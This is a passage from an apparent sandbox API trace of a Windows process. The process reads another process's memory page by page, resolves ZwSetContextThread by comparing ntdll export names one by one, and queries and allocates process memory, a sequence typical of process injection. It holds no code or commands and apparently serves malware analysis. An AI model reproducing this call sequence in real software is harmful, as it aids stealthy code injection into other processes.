NumberOfBytesRead=0x1000) returned 0x0 [0076.695] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee46f000, Buffer=0x7ff8, BufferSize=0x266f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.695] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee470000, Buffer=0x7ff8, BufferSize=0x2670000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.695] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee471000, Buffer=0x7ff8, BufferSize=0x2671000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.695] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee472000, Buffer=0x7ff8, BufferSize=0x2672000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.696] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee473000, Buffer=0x7ff8, BufferSize=0x2673000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.696] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee474000, Buffer=0x7ff8, BufferSize=0x2674000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.696] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee475000, Buffer=0x7ff8, BufferSize=0x2675000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.696] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee476000, Buffer=0x7ff8, BufferSize=0x2676000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.696] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee477000, Buffer=0x7ff8, BufferSize=0x2677000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.696] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee478000, Buffer=0x7ff8, BufferSize=0x2678000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.727] lstrcmpA (lpString1="A_SHAFinal", lpString2="ZwSetContextThread") returned -1 [0076.727] lstrcmpA (lpString1="A_SHAInit", lpString2="ZwSetContextThread") returned -1 [0076.727] lstrcmpA (lpString1="A_SHAUpdate", lpString2="ZwSetContextThread") returned -1 [0076.727] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="ZwSetContextThread") returned -1 [0076.727] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="ZwSetContextThread") returned -1 [0076.727] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="ZwSetContextThread") returned -1 [0076.727] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="ZwSetContextThread") returned -1 [0076.727] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="ZwSetContextThread") returned -1 [0076.727] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="ZwSetContextThread") returned -1 [0076.728] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="ZwSetContextThread") returned -1 [0076.728] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="ZwSetContextThread") returned -1 [0076.728] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="ZwSetContextThread") returned -1 [0076.728] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="ZwSetContextThread") returned -1 [0076.728] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="ZwSetContextThread") returned -1 [0076.728] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="ZwSetContextThread") returned -1 [0076.728] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="ZwSetContextThread") returned -1 [0076.728] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="ZwSetContextThread") returned -1 [0076.728] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="ZwSetContextThread") returned -1 [0076.728] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="ZwSetContextThread") returned -1 [0076.728] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="ZwSetContextThread") returned -1 [0076.728] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="ZwSetContextThread") returned -1 [0076.728] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="ZwSetContextThread") returned -1 [0076.728] lstrcmpA (lpString1="CsrCaptureMessageMultiUnicodeStringsInPlace", lpString2="ZwSetContextThread") returned -1 [0076.728] lstrcmpA (lpString1="CsrCaptureMessageString", lpString2="ZwSetContextThread") returned -1 [0076.728] lstrcmpA (lpString1="CsrCaptureTimeout", lpString2="ZwSetContextThread") returned -1 [0076.728] lstrcmpA (lpString1="CsrClientCallServer", lpString2="ZwSetContextThread") returned -1 [0076.728] lstrcmpA (lpString1="CsrClientConnectToServer", lpString2="ZwSetContextThread") returned -1 [0076.728] lstrcmpA (lpString1="CsrFreeCaptureBuffer", lpString2="ZwSetContextThread") returned -1 [0076.728] lstrcmpA (lpString1="CsrGetProcessId", lpString2="ZwSetContextThread") returned -1 [0076.728] lstrcmpA (lpString1="CsrIdentifyAlertableThread", lpString2="ZwSetContextThread") returned -1 [0076.728] lstrcmpA (lpString1="CsrSetPriorityClass", lpString2="ZwSetContextThread") returned -1 [0076.728] lstrcmpA (lpString1="CsrVerifyRegion", lpString2="ZwSetContextThread") returned -1 [0076.728] lstrcmpA (lpString1="DbgBreakPoint", lpString2="ZwSetContextThread") returned -1 [0076.728] lstrcmpA (lpString1="DbgPrint", lpString2="ZwSetContextThread") returned -1 [0076.728] lstrcmpA (lpString1="DbgPrintEx", lpString2="ZwSetContextThread") returned -1 [0076.728] lstrcmpA (lpString1="DbgPrintReturnControlC", lpString2="ZwSetContextThread") returned -1 [0076.728] lstrcmpA (lpString1="DbgPrompt", lpString2="ZwSetContextThread") returned -1 [0076.728] lstrcmpA (lpString1="DbgQueryDebugFilterState", lpString2="ZwSetContextThread") returned -1 [0076.728] lstrcmpA (lpString1="DbgSetDebugFilterState", lpString2="ZwSetContextThread") returned -1 [0076.728] lstrcmpA (lpString1="DbgUiConnectToDbg", lpString2="ZwSetContextThread") returned -1 [0076.728] lstrcmpA (lpString1="DbgUiContinue", lpString2="ZwSetContextThread") returned -1 [0076.728] lstrcmpA (lpString1="DbgUiConvertStateChangeStructure", lpString2="ZwSetContextThread") returned -1 [0076.728] lstrcmpA (lpString1="DbgUiConvertStateChangeStructureEx", lpString2="ZwSetContextThread") returned -1 [0076.729] lstrcmpA (lpString1="DbgUiDebugActiveProcess", lpString2="ZwSetContextThread") returned -1 [0076.729] lstrcmpA (lpString1="DbgUiGetThreadDebugObject", lpString2="ZwSetContextThread") returned -1 [0076.729] lstrcmpA (lpString1="DbgUiIssueRemoteBreakin", lpString2="ZwSetContextThread") returned -1 [0076.729] lstrcmpA (lpString1="DbgUiRemoteBreakin", lpString2="ZwSetContextThread") returned -1 [0076.729] lstrcmpA (lpString1="DbgUiSetThreadDebugObject", lpString2="ZwSetContextThread") returned -1 [0076.729] lstrcmpA (lpString1="DbgUiStopDebugging", lpString2="ZwSetContextThread") returned -1 [0076.729] lstrcmpA (lpString1="DbgUiWaitStateChange", lpString2="ZwSetContextThread") returned -1 [0076.729] lstrcmpA (lpString1="DbgUserBreakPoint", lpString2="ZwSetContextThread") returned -1 [0076.729] lstrcmpA (lpString1="EtwCreateTraceInstanceId", lpString2="ZwSetContextThread") returned -1 [0076.729] lstrcmpA (lpString1="EtwDeliverDataBlock", lpString2="ZwSetContextThread") returned -1 [0076.729] lstrcmpA (lpString1="EtwEnumerateProcessRegGuids", lpString2="ZwSetContextThread") returned -1 [0076.729] lstrcmpA (lpString1="EtwEventActivityIdControl", lpString2="ZwSetContextThread") returned -1 [0076.729] lstrcmpA (lpString1="EtwEventEnabled", lpString2="ZwSetContextThread") returned -1 [0076.729] lstrcmpA (lpString1="EtwEventProviderEnabled", lpString2="ZwSetContextThread") returned -1 [0076.729] lstrcmpA (lpString1="EtwEventRegister", lpString2="ZwSetContextThread") returned -1 [0076.729] lstrcmpA (lpString1="EtwEventSetInformation", lpString2="ZwSetContextThread") returned -1 [0076.729] lstrcmpA (lpString1="EtwEventUnregister", lpString2="ZwSetContextThread") returned -1 [0076.729] lstrcmpA (lpString1="EtwEventWrite", lpString2="ZwSetContextThread") returned -1 [0076.729] lstrcmpA (lpString1="EtwEventWriteEndScenario", lpString2="ZwSetContextThread") returned -1 [0076.729] lstrcmpA (lpString1="EtwEventWriteEx", lpString2="ZwSetContextThread") returned -1 [0076.729] lstrcmpA (lpString1="EtwEventWriteFull", lpString2="ZwSetContextThread") returned -1 [0076.729] lstrcmpA (lpString1="EtwEventWriteNoRegistration", lpString2="ZwSetContextThread") returned -1 [0076.729] lstrcmpA (lpString1="EtwEventWriteStartScenario", lpString2="ZwSetContextThread") returned -1 [0076.729] lstrcmpA (lpString1="EtwEventWriteString", lpString2="ZwSetContextThread") returned -1 [0076.730] lstrcmpA (lpString1="EtwEventWriteTransfer", lpString2="ZwSetContextThread") returned -1 [0076.730] lstrcmpA (lpString1="EtwGetTraceEnableFlags", lpString2="ZwSetContextThread") returned -1 [0076.730] lstrcmpA (lpString1="EtwGetTraceEnableLevel", lpString2="ZwSetContextThread") returned -1 [0076.730] lstrcmpA (lpString1="EtwGetTraceLoggerHandle", lpString2="ZwSetContextThread") returned -1 [0076.730] lstrcmpA (lpString1="EtwLogTraceEvent", lpString2="ZwSetContextThread") returned -1 [0076.730] lstrcmpA (lpString1="EtwNotificationRegister", lpString2="ZwSetContextThread") returned -1 [0076.730] lstrcmpA (lpString1="EtwNotificationUnregister", lpString2="ZwSetContextThread") returned -1 [0076.730] lstrcmpA (lpString1="EtwProcessPrivateLoggerRequest", lpString2="ZwSetContextThread") returned -1 [0076.730] lstrcmpA (lpString1="EtwRegisterSecurityProvider", lpString2="ZwSetContextThread") returned -1 [0076.730] lstrcmpA (lpString1="EtwRegisterTraceGuidsA", lpString2="ZwSetContextThread") returned -1 [0076.730] lstrcmpA (lpString1="EtwRegisterTraceGuidsW", lpString2="ZwSetContextThread") returned -1 [0076.730] lstrcmpA (lpString1="EtwReplyNotification", lpString2="ZwSetContextThread") returned -1 [0076.730] lstrcmpA (lpString1="EtwSendNotification", lpString2="ZwSetContextThread") returned -1 [0076.730] lstrcmpA (lpString1="EtwSetMark", lpString2="ZwSetContextThread") returned -1 [0076.730] lstrcmpA (lpString1="EtwTraceEventInstance", lpString2="ZwSetContextThread") returned -1 [0076.730] lstrcmpA (lpString1="EtwTraceMessage", lpString2="ZwSetContextThread") returned -1 [0076.730] lstrcmpA (lpString1="EtwTraceMessageVa", lpString2="ZwSetContextThread") returned -1 [0076.730] lstrcmpA (lpString1="EtwUnregisterTraceGuids", lpString2="ZwSetContextThread") returned -1 [0076.730] lstrcmpA (lpString1="EtwWriteUMSecurityEvent", lpString2="ZwSetContextThread") returned -1 [0076.730] lstrcmpA (lpString1="EtwpCreateEtwThread", lpString2="ZwSetContextThread") returned -1 [0076.730] lstrcmpA (lpString1="EtwpGetCpuSpeed", lpString2="ZwSetContextThread") returned -1 [0076.730] lstrcmpA (lpString1="EvtIntReportAuthzEventAndSourceAsync", lpString2="ZwSetContextThread") returned -1 [0076.730] lstrcmpA (lpString1="EvtIntReportEventAndSourceAsync", lpString2="ZwSetContextThread") returned -1 [0076.730] lstrcmpA (lpString1="ExpInterlockedPopEntrySListEnd", lpString2="ZwSetContextThread") returned -1 [0076.730] lstrcmpA (lpString1="ExpInterlockedPopEntrySListFault", lpString2="ZwSetContextThread") returned -1 [0076.730] lstrcmpA (lpString1="ExpInterlockedPopEntrySListResume", lpString2="ZwSetContextThread") returned -1 [0076.730] lstrcmpA (lpString1="KiRaiseUserExceptionDispatcher", lpString2="ZwSetContextThread") returned -1 [0076.730] lstrcmpA (lpString1="KiUserApcDispatcher", lpString2="ZwSetContextThread") returned -1 [0076.730] lstrcmpA (lpString1="KiUserCallbackDispatcher", lpString2="ZwSetContextThread") returned -1 [0076.730] lstrcmpA (lpString1="KiUserExceptionDispatcher", lpString2="ZwSetContextThread") returned -1 [0076.730] lstrcmpA (lpString1="KiUserInvertedFunctionTable", lpString2="ZwSetContextThread") returned -1 [0076.730] lstrcmpA (lpString1="LdrAccessResource", lpString2="ZwSetContextThread") returned -1 [0076.730] lstrcmpA (lpString1="LdrAddDllDirectory", lpString2="ZwSetContextThread") returned -1 [0076.730] lstrcmpA (lpString1="LdrAddLoadAsDataTable", lpString2="ZwSetContextThread") returned -1 [0076.731] lstrcmpA (lpString1="LdrAddRefDll", lpString2="ZwSetContextThread") returned -1 [0076.731] lstrcmpA (lpString1="LdrAppxHandleIntegrityFailure", lpString2="ZwSetContextThread") returned -1 [0076.731] lstrcmpA (lpString1="LdrDisableThreadCalloutsForDll", lpString2="ZwSetContextThread") returned -1 [0076.731] lstrcmpA (lpString1="LdrEnumResources", lpString2="ZwSetContextThread") returned -1 [0076.731] lstrcmpA (lpString1="LdrEnumerateLoadedModules", lpString2="ZwSetContextThread") returned -1 [0076.731] lstrcmpA (lpString1="LdrFastFailInLoaderCallout", lpString2="ZwSetContextThread") returned -1 [0076.731] lstrcmpA (lpString1="LdrFindEntryForAddress", lpString2="ZwSetContextThread") returned -1 [0076.731] lstrcmpA (lpString1="LdrFindResourceDirectory_U", lpString2="ZwSetContextThread") returned -1 [0076.731] lstrcmpA (lpString1="LdrFindResourceEx_U", lpString2="ZwSetContextThread") returned -1 [0076.731] lstrcmpA (lpString1="LdrFindResource_U", lpString2="ZwSetContextThread") returned -1 [0076.731] lstrcmpA (lpString1="LdrFlushAlternateResourceModules", lpString2="ZwSetContextThread") returned -1 [0076.731] lstrcmpA (lpString1="LdrGetDllDirectory", lpString2="ZwSetContextThread") returned -1 [0076.731] lstrcmpA (lpString1="LdrGetDllFullName", lpString2="ZwSetContextThread") returned -1 [0076.731] lstrcmpA (lpString1="LdrGetDllHandle", lpString2="ZwSetContextThread") returned -1 [0076.731] lstrcmpA (lpString1="LdrGetDllHandleByMapping", lpString2="ZwSetContextThread") returned -1 [0076.731] lstrcmpA (lpString1="LdrGetDllHandleByName", lpString2="ZwSetContextThread") returned -1 [0076.731] lstrcmpA (lpString1="LdrGetDllHandleEx", lpString2="ZwSetContextThread") returned -1 [0076.731] lstrcmpA (lpString1="LdrGetDllPath", lpString2="ZwSetContextThread") returned -1 [0076.731] lstrcmpA (lpString1="LdrGetFailureData", lpString2="ZwSetContextThread") returned -1 [0076.731] lstrcmpA (lpString1="LdrGetFileNameFromLoadAsDataTable", lpString2="ZwSetContextThread") returned -1 [0076.731] lstrcmpA (lpString1="LdrGetKnownDllSectionHandle", lpString2="ZwSetContextThread") returned -1 [0076.731] lstrcmpA (lpString1="LdrGetProcedureAddress", lpString2="ZwSetContextThread") returned -1 [0076.731] lstrcmpA (lpString1="LdrGetProcedureAddressEx", lpString2="ZwSetContextThread") returned -1 [0076.731] lstrcmpA (lpString1="LdrGetProcedureAddressForCaller", lpString2="ZwSetContextThread") returned -1 [0076.731] lstrcmpA (lpString1="LdrInitShimEngineDynamic", lpString2="ZwSetContextThread") returned -1 [0076.731] lstrcmpA (lpString1="LdrInitializeThunk", lpString2="ZwSetContextThread") returned -1 [0076.731] lstrcmpA (lpString1="LdrLoadAlternateResourceModule", lpString2="ZwSetContextThread") returned -1 [0076.731] lstrcmpA (lpString1="LdrLoadAlternateResourceModuleEx", lpString2="ZwSetContextThread") returned -1 [0076.731] lstrcmpA (lpString1="LdrLoadDll", lpString2="ZwSetContextThread") returned -1 [0076.731] lstrcmpA (lpString1="LdrLockLoaderLock", lpString2="ZwSetContextThread") returned -1 [0076.731] lstrcmpA (lpString1="LdrOpenImageFileOptionsKey", lpString2="ZwSetContextThread") returned -1 [0076.731] lstrcmpA (lpString1="LdrProcessInitializationComplete", lpString2="ZwSetContextThread") returned -1 [0076.731] lstrcmpA (lpString1="LdrProcessRelocationBlock", lpString2="ZwSetContextThread") returned -1 [0076.731] lstrcmpA (lpString1="LdrProcessRelocationBlockEx", lpString2="ZwSetContextThread") returned -1 [0076.732] lstrcmpA (lpString1="LdrQueryImageFileExecutionOptions", lpString2="ZwSetContextThread") returned -1 [0076.732] lstrcmpA (lpString1="LdrQueryImageFileExecutionOptionsEx", lpString2="ZwSetContextThread") returned -1 [0076.732] lstrcmpA (lpString1="LdrQueryImageFileKeyOption", lpString2="ZwSetContextThread") returned -1 [0076.732] lstrcmpA (lpString1="LdrQueryModuleServiceTags", lpString2="ZwSetContextThread") returned -1 [0076.732] lstrcmpA (lpString1="LdrQueryOptionalDelayLoadedAPI", lpString2="ZwSetContextThread") returned -1 [0076.732] lstrcmpA (lpString1="LdrQueryProcessModuleInformation", lpString2="ZwSetContextThread") returned -1 [0076.732] lstrcmpA (lpString1="LdrRegisterDllNotification", lpString2="ZwSetContextThread") returned -1 [0076.732] lstrcmpA (lpString1="LdrRemoveDllDirectory", lpString2="ZwSetContextThread") returned -1 [0076.732] lstrcmpA (lpString1="LdrRemoveLoadAsDataTable", lpString2="ZwSetContextThread") returned -1 [0076.732] lstrcmpA (lpString1="LdrResFindResource", lpString2="ZwSetContextThread") returned -1 [0076.732] lstrcmpA (lpString1="LdrResFindResourceDirectory", lpString2="ZwSetContextThread") returned -1 [0076.732] lstrcmpA (lpString1="LdrResGetRCConfig", lpString2="ZwSetContextThread") returned -1 [0076.732] lstrcmpA (lpString1="LdrResRelease", lpString2="ZwSetContextThread") returned -1 [0076.732] lstrcmpA (lpString1="LdrResSearchResource", lpString2="ZwSetContextThread") returned -1 [0076.732] lstrcmpA (lpString1="LdrResolveDelayLoadedAPI", lpString2="ZwSetContextThread") returned -1 [0076.732] lstrcmpA (lpString1="LdrResolveDelayLoadsFromDll", lpString2="ZwSetContextThread") returned -1 [0076.732] lstrcmpA (lpString1="LdrRscIsTypeExist", lpString2="ZwSetContextThread") returned -1 [0076.732] lstrcmpA (lpString1="LdrSetAppCompatDllRedirectionCallback", lpString2="ZwSetContextThread") returned -1 [0076.732] lstrcmpA (lpString1="LdrSetDefaultDllDirectories", lpString2="ZwSetContextThread") returned -1 [0076.732] lstrcmpA (lpString1="LdrSetDllDirectory", lpString2="ZwSetContextThread") returned -1 [0076.732] lstrcmpA (lpString1="LdrSetDllManifestProber", lpString2="ZwSetContextThread") returned -1 [0076.732] lstrcmpA (lpString1="LdrSetImplicitPathOptions", lpString2="ZwSetContextThread") returned -1 [0076.732] lstrcmpA (lpString1="LdrSetMUICacheType", lpString2="ZwSetContextThread") returned -1 [0076.732] lstrcmpA (lpString1="LdrShutdownProcess", lpString2="ZwSetContextThread") returned -1 [0076.732] lstrcmpA (lpString1="LdrShutdownThread", lpString2="ZwSetContextThread") returned -1 [0076.732] lstrcmpA (lpString1="LdrStandardizeSystemPath", lpString2="ZwSetContextThread") returned -1 [0076.732] lstrcmpA (lpString1="LdrSystemDllInitBlock", lpString2="ZwSetContextThread") returned -1 [0076.732] lstrcmpA (lpString1="LdrUnloadAlternateResourceModule", lpString2="ZwSetContextThread") returned -1 [0076.732] lstrcmpA (lpString1="LdrUnloadAlternateResourceModuleEx", lpString2="ZwSetContextThread") returned -1 [0076.732] lstrcmpA (lpString1="LdrUnloadDll", lpString2="ZwSetContextThread") returned -1 [0076.732] lstrcmpA (lpString1="LdrUnlockLoaderLock", lpString2="ZwSetContextThread") returned -1 [0076.732] lstrcmpA (lpString1="LdrUnregisterDllNotification", lpString2="ZwSetContextThread") returned -1 [0076.732] lstrcmpA (lpString1="LdrVerifyImageMatchesChecksum", lpString2="ZwSetContextThread") returned -1 [0076.732] lstrcmpA (lpString1="LdrVerifyImageMatchesChecksumEx", lpString2="ZwSetContextThread") returned -1 [0076.733] lstrcmpA (lpString1="LdrpResGetMappingSize", lpString2="ZwSetContextThread") returned -1 [0076.733] lstrcmpA (lpString1="LdrpResGetResourceDirectory", lpString2="ZwSetContextThread") returned -1 [0076.733] lstrcmpA (lpString1="MD4Final", lpString2="ZwSetContextThread") returned -1 [0076.733] lstrcmpA (lpString1="MD4Init", lpString2="ZwSetContextThread") returned -1 [0076.733] lstrcmpA (lpString1="MD4Update", lpString2="ZwSetContextThread") returned -1 [0076.733] lstrcmpA (lpString1="MD5Final", lpString2="ZwSetContextThread") returned -1 [0076.733] lstrcmpA (lpString1="MD5Init", lpString2="ZwSetContextThread") returned -1 [0076.733] lstrcmpA (lpString1="MD5Update", lpString2="ZwSetContextThread") returned -1 [0076.733] lstrcmpA (lpString1="NlsAnsiCodePage", lpString2="ZwSetContextThread") returned -1 [0076.733] lstrcmpA (lpString1="NlsMbCodePageTag", lpString2="ZwSetContextThread") returned -1 [0076.733] lstrcmpA (lpString1="NlsMbOemCodePageTag", lpString2="ZwSetContextThread") returned -1 [0076.733] lstrcmpA (lpString1="NtAcceptConnectPort", lpString2="ZwSetContextThread") returned -1 [0076.733] lstrcmpA (lpString1="NtAccessCheck", lpString2="ZwSetContextThread") returned -1 [0076.733] lstrcmpA (lpString1="NtAccessCheckAndAuditAlarm", lpString2="ZwSetContextThread") returned -1 [0076.733] lstrcmpA (lpString1="NtAccessCheckByType", lpString2="ZwSetContextThread") returned -1 [0076.733] lstrcmpA (lpString1="NtAccessCheckByTypeAndAuditAlarm", lpString2="ZwSetContextThread") returned -1 [0076.733] lstrcmpA (lpString1="NtAccessCheckByTypeResultList", lpString2="ZwSetContextThread") returned -1 [0076.733] lstrcmpA (lpString1="NtAccessCheckByTypeResultListAndAuditAlarm", lpString2="ZwSetContextThread") returned -1 [0076.733] lstrcmpA (lpString1="NtAccessCheckByTypeResultListAndAuditAlarmByHandle", lpString2="ZwSetContextThread") returned -1 [0076.733] lstrcmpA (lpString1="NtAddAtom", lpString2="ZwSetContextThread") returned -1 [0076.733] lstrcmpA (lpString1="NtAddAtomEx", lpString2="ZwSetContextThread") returned -1 [0076.733] lstrcmpA (lpString1="NtAddBootEntry", lpString2="ZwSetContextThread") returned -1 [0076.733] lstrcmpA (lpString1="NtAddDriverEntry", lpString2="ZwSetContextThread") returned -1 [0076.733] lstrcmpA (lpString1="NtAdjustGroupsToken", lpString2="ZwSetContextThread") returned -1 [0076.733] lstrcmpA (lpString1="NtAdjustPrivilegesToken", lpString2="ZwSetContextThread") returned -1 [0076.733] lstrcmpA (lpString1="NtAdjustTokenClaimsAndDeviceGroups", lpString2="ZwSetContextThread") returned -1 [0076.733] lstrcmpA (lpString1="NtAlertResumeThread", lpString2="ZwSetContextThread") returned -1 [0076.733] lstrcmpA (lpString1="NtAlertThread", lpString2="ZwSetContextThread") returned -1 [0076.733] lstrcmpA (lpString1="NtAlertThreadByThreadId", lpString2="ZwSetContextThread") returned -1 [0076.733] lstrcmpA (lpString1="NtAllocateLocallyUniqueId", lpString2="ZwSetContextThread") returned -1 [0076.733] lstrcmpA (lpString1="NtAllocateReserveObject", lpString2="ZwSetContextThread") returned -1 [0076.733] lstrcmpA (lpString1="NtAllocateUserPhysicalPages", lpString2="ZwSetContextThread") returned -1 [0076.733] lstrcmpA (lpString1="NtAllocateUuids", lpString2="ZwSetContextThread") returned -1 [0076.733] lstrcmpA (lpString1="NtAllocateVirtualMemory", lpString2="ZwSetContextThread") returned -1 [0076.734] lstrcmpA (lpString1="NtAlpcAcceptConnectPort", lpString2="ZwSetContextThread") returned -1 [0076.734] lstrcmpA (lpString1="NtAlpcCancelMessage", lpString2="ZwSetContextThread") returned -1 [0076.734] lstrcmpA (lpString1="NtAlpcConnectPort", lpString2="ZwSetContextThread") returned -1 [0076.734] lstrcmpA (lpString1="NtAlpcConnectPortEx", lpString2="ZwSetContextThread") returned -1 [0076.734] lstrcmpA (lpString1="NtAlpcCreatePort", lpString2="ZwSetContextThread") returned -1 [0076.734] lstrcmpA (lpString1="NtAlpcCreatePortSection", lpString2="ZwSetContextThread") returned -1 [0076.734] lstrcmpA (lpString1="NtAlpcCreateResourceReserve", lpString2="ZwSetContextThread") returned -1 [0076.734] lstrcmpA (lpString1="NtAlpcCreateSectionView", lpString2="ZwSetContextThread") returned -1 [0076.734] lstrcmpA (lpString1="NtAlpcCreateSecurityContext", lpString2="ZwSetContextThread") returned -1 [0076.734] lstrcmpA (lpString1="NtAlpcDeletePortSection", lpString2="ZwSetContextThread") returned -1 [0076.734] lstrcmpA (lpString1="NtAlpcDeleteResourceReserve", lpString2="ZwSetContextThread") returned -1 [0076.734] lstrcmpA (lpString1="NtAlpcDeleteSectionView", lpString2="ZwSetContextThread") returned -1 [0076.734] lstrcmpA (lpString1="NtAlpcDeleteSecurityContext", lpString2="ZwSetContextThread") returned -1 [0076.734] lstrcmpA (lpString1="NtAlpcDisconnectPort", lpString2="ZwSetContextThread") returned -1 [0076.734] lstrcmpA (lpString1="NtAlpcImpersonateClientContainerOfPort", lpString2="ZwSetContextThread") returned -1 [0076.734] lstrcmpA (lpString1="NtAlpcImpersonateClientOfPort", lpString2="ZwSetContextThread") returned -1 [0076.734] lstrcmpA (lpString1="NtAlpcOpenSenderProcess", lpString2="ZwSetContextThread") returned -1 [0076.734] lstrcmpA (lpString1="NtAlpcOpenSenderThread", lpString2="ZwSetContextThread") returned -1 [0076.734] lstrcmpA (lpString1="NtAlpcQueryInformation", lpString2="ZwSetContextThread") returned -1 [0076.734] lstrcmpA (lpString1="NtAlpcQueryInformationMessage", lpString2="ZwSetContextThread") returned -1 [0076.734] lstrcmpA (lpString1="NtAlpcRevokeSecurityContext", lpString2="ZwSetContextThread") returned -1 [0076.734] lstrcmpA (lpString1="NtAlpcSendWaitReceivePort", lpString2="ZwSetContextThread") returned -1 [0076.734] lstrcmpA (lpString1="NtAlpcSetInformation", lpString2="ZwSetContextThread") returned -1 [0076.734] lstrcmpA (lpString1="NtApphelpCacheControl", lpString2="ZwSetContextThread") returned -1 [0076.734] lstrcmpA (lpString1="NtAreMappedFilesTheSame", lpString2="ZwSetContextThread") returned -1 [0076.734] lstrcmpA (lpString1="NtAssignProcessToJobObject", lpString2="ZwSetContextThread") returned -1 [0076.734] lstrcmpA (lpString1="NtAssociateWaitCompletionPacket", lpString2="ZwSetContextThread") returned -1 [0076.734] lstrcmpA (lpString1="NtCallbackReturn", lpString2="ZwSetContextThread") returned -1 [0076.734] lstrcmpA (lpString1="NtCancelIoFile", lpString2="ZwSetContextThread") returned -1 [0076.734] lstrcmpA (lpString1="NtCancelIoFileEx", lpString2="ZwSetContextThread") returned -1 [0076.734] lstrcmpA (lpString1="NtCancelSynchronousIoFile", lpString2="ZwSetContextThread") returned -1 [0076.734] lstrcmpA (lpString1="NtCancelTimer", lpString2="ZwSetContextThread") returned -1 [0076.734] lstrcmpA (lpString1="NtCancelTimer2", lpString2="ZwSetContextThread") returned -1 [0076.734] lstrcmpA (lpString1="NtCancelWaitCompletionPacket", lpString2="ZwSetContextThread") returned -1 [0076.735] lstrcmpA (lpString1="NtClearEvent", lpString2="ZwSetContextThread") returned -1 [0076.735] lstrcmpA (lpString1="NtClose", lpString2="ZwSetContextThread") returned -1 [0076.735] lstrcmpA (lpString1="NtCloseObjectAuditAlarm", lpString2="ZwSetContextThread") returned -1 [0076.735] lstrcmpA (lpString1="NtCommitComplete", lpString2="ZwSetContextThread") returned -1 [0076.735] lstrcmpA (lpString1="NtCommitEnlistment", lpString2="ZwSetContextThread") returned -1 [0076.735] lstrcmpA (lpString1="NtCommitTransaction", lpString2="ZwSetContextThread") returned -1 [0076.735] lstrcmpA (lpString1="NtCompactKeys", lpString2="ZwSetContextThread") returned -1 [0076.735] lstrcmpA (lpString1="NtCompareObjects", lpString2="ZwSetContextThread") returned -1 [0076.735] lstrcmpA (lpString1="NtCompareTokens", lpString2="ZwSetContextThread") returned -1 [0076.735] lstrcmpA (lpString1="NtCompleteConnectPort", lpString2="ZwSetContextThread") returned -1 [0076.735] lstrcmpA (lpString1="NtCompressKey", lpString2="ZwSetContextThread") returned -1 [0076.735] lstrcmpA (lpString1="NtConnectPort", lpString2="ZwSetContextThread") returned -1 [0076.735] VirtualFree (lpAddress=0x2580000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.744] GetModuleHandleA (lpModuleName="NTDLL.DLL") returned 0x77ca0000 [0076.744] GetProcAddress (hModule=0x77ca0000, lpProcName="ZwWow64QueryInformationProcess64") returned 0x77d0a840 [0076.744] NtWow64QueryInformationProcess64 (in: ProcessHandle=0x1e4, ProcessInformationClass=0x0, ProcessInformation64=0x5df414, ProcessInformationLength=0x30, ReturnLength=0x5df468 | out: ProcessInformation64=0x5df414, ReturnLength=0x5df468) returned 0x0 [0076.744] VirtualAlloc (lpAddress=0x0, dwSize=0x5a4, flAllocationType=0x3000, flProtect=0x4) returned 0x160000 [0076.745] GetModuleHandleA (lpModuleName="NTDLL.DLL") returned 0x77ca0000 [0076.745] GetProcAddress (hModule=0x77ca0000, lpProcName="ZwWow64QueryInformationProcess64") returned 0x77d0a840 [0076.745] NtWow64QueryInformationProcess64 (in: ProcessHandle=0x1e4, ProcessInformationClass=0x0, ProcessInformation64=0x5df414, 